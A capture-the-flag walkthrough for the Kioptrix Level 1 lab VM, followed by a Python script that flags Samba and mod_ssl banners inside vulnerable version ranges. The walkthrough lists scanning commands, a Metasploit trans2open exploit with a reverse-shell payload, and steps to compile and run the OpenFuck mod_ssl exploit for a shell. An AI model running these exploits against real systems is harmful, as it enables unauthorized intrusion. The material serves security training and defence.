Kioptrix 1 Machine

Kioptrix Level 1 machine

Boot to root access

Description

This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

Methodology

• Network Scanning
• Enumeration
• Exploitation
• Gaining root access

Used Tools

• Nmap
• Nikto
• Metasploit
• enum4linux
• msfconsole

Turn on your attacking machine and the Kioptrix 1.0 virtual machine, and scan the local network to get the victim's IP address. You can use the netdiscover command for that.

First, switch user to root.

Note: Make sure that your network connection is set to bridged or NAT.

sudo netdiscover

We will see that the IP address of the Kioptrix machine is 192.168.1.2 (picture is given below).

After getting the IP address of the target, we enumerate the target for open ports and protocols. I used the enum4linux command for that. Note that your target IP address may be different from mine.

enum4linux 192.168.1.2

(Here we find that Samba is vulnerable, as the picture given below shows.)

Then I ran a Nikto vulnerability scan with the following command.

nikto -h 192.168.1.2

From the above enumeration it becomes clear that the lab can be exploited in multiple ways, so without wasting time we execute the following commands with the help of Metasploit and try to compromise the target VM.

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

I used Metasploit to exploit this vulnerability.

To start Metasploit DB we can use the following commands.

msfconsole
search samba (in msfconsole)

A list of options will appear; out of them:

use 22 (or search trans2open)

Then we search for the vulnerability and configure the options for exploitation.

use exploit/linux/samba/trans2open

We can use the options command to see the options.

Then configure the remote host (RHOST), local host (LHOST), and the payload. Here we use the reverse_tcp shell to escalate the privileges.

msf exploit(linux/samba/trans2open) > set RHOST 192.168.1.2

msf exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp

msf exploit(linux/samba/trans2open) > exploit

Here we get root access, which is our main motive, so the task is completed.

Second method to solve Kioptrix Level 1

In this method we first run nikto against https://192.168.3.233/

Then we will see that there is a vulnerability in Apache: we find that the Apache version is 1.3.2, so we will be able to find the shell.

So first we find the shell by searching for mod ssl<2.8.7 on the site, and install the following on Kali:

apt-get install libssl-dev

locate 4780

Then copy the file by using the following command:

cp /usr/share/exploitdb/exploits/unix/remote/4780.c /home/path

Then run the command:

gcc -o OpenFuck 4780.c -lcrypto

Then run the command:

./OpenFuck 0x6b <IP address> 443 -c 40

Hence you get a shell on the Kioptrix machine.
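
From the defender's side, both methods above depend on version ranges the walkthrough names: Samba 2.2.0 to 2.2.8 and mod_ssl below 2.8.7. The following is an added example, not part of the original walkthrough, that checks service banners collected from your own hosts against those two ranges. The banner formats, the host addresses and the rule that a letter suffix such as 2.2.8a sorts after the bare release are assumptions made for this example.

```python
import re

# Affected ranges exactly as the walkthrough states them:
#   Samba 2.2.0 to 2.2.8 (inclusive), mod_ssl below 2.8.7.
AFFECTED = {
    "samba": lambda v: (2, 2, 0, "") <= v <= (2, 2, 8, ""),
    "mod_ssl": lambda v: v < (2, 8, 7, ""),
}
# Banner shapes are assumptions: "Samba 2.2.1a" / "Samba/2.2.1a" and "mod_ssl/2.8.4".
PATTERNS = {
    "samba": re.compile(r"\bsamba[ /](\d+(?:\.\d+)+[a-z]?)", re.I),
    "mod_ssl": re.compile(r"\bmod_ssl/(\d+(?:\.\d+)+[a-z]?)", re.I),
}

def parse_version(text):
    """'2.2.1a' -> (2, 2, 1, 'a'). Numeric parts are compared as integers and
    padded to three; a letter suffix sorts after the bare release (assumption)."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", text.strip().lower())
    if not m:
        return None
    nums = [int(p) for p in m.group(1).split(".")][:3]
    nums += [0] * (3 - len(nums))
    return (*nums, m.group(2))

def audit(lines):
    """Each line is '<host> <banner text>'. Returns (host, product, version)
    for every banner whose version falls inside an affected range."""
    findings = []
    for line in lines:
        host, _, banner = line.partition(" ")
        for product, pattern in PATTERNS.items():
            for raw in pattern.findall(banner):
                version = parse_version(raw)
                if version is not None and AFFECTED[product](version):
                    findings.append((host, product, raw))
    return findings

# Constructed inventory lines (TEST-NET addresses), not output from the lab.
SAMPLE = [
    "192.0.2.5 Server: Apache/1.3.20 (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "192.0.2.5 OS=[Unix] Server=[Samba 2.2.1a]",
    "192.0.2.6 OS=[Unix] Server=[Samba 2.2.8a]",
    "192.0.2.7 Server: Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c",
    "192.0.2.8 OS=[Unix] Server=[Samba 3.0.20]",
]

if __name__ == "__main__":
    for host, product, version in audit(SAMPLE):
        print(f"{host}: {product} {version} is inside an affected range")
```

Comparing the parts as integers matters here: a plain string comparison would wrongly place mod_ssl 2.8.16 below 2.8.7.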
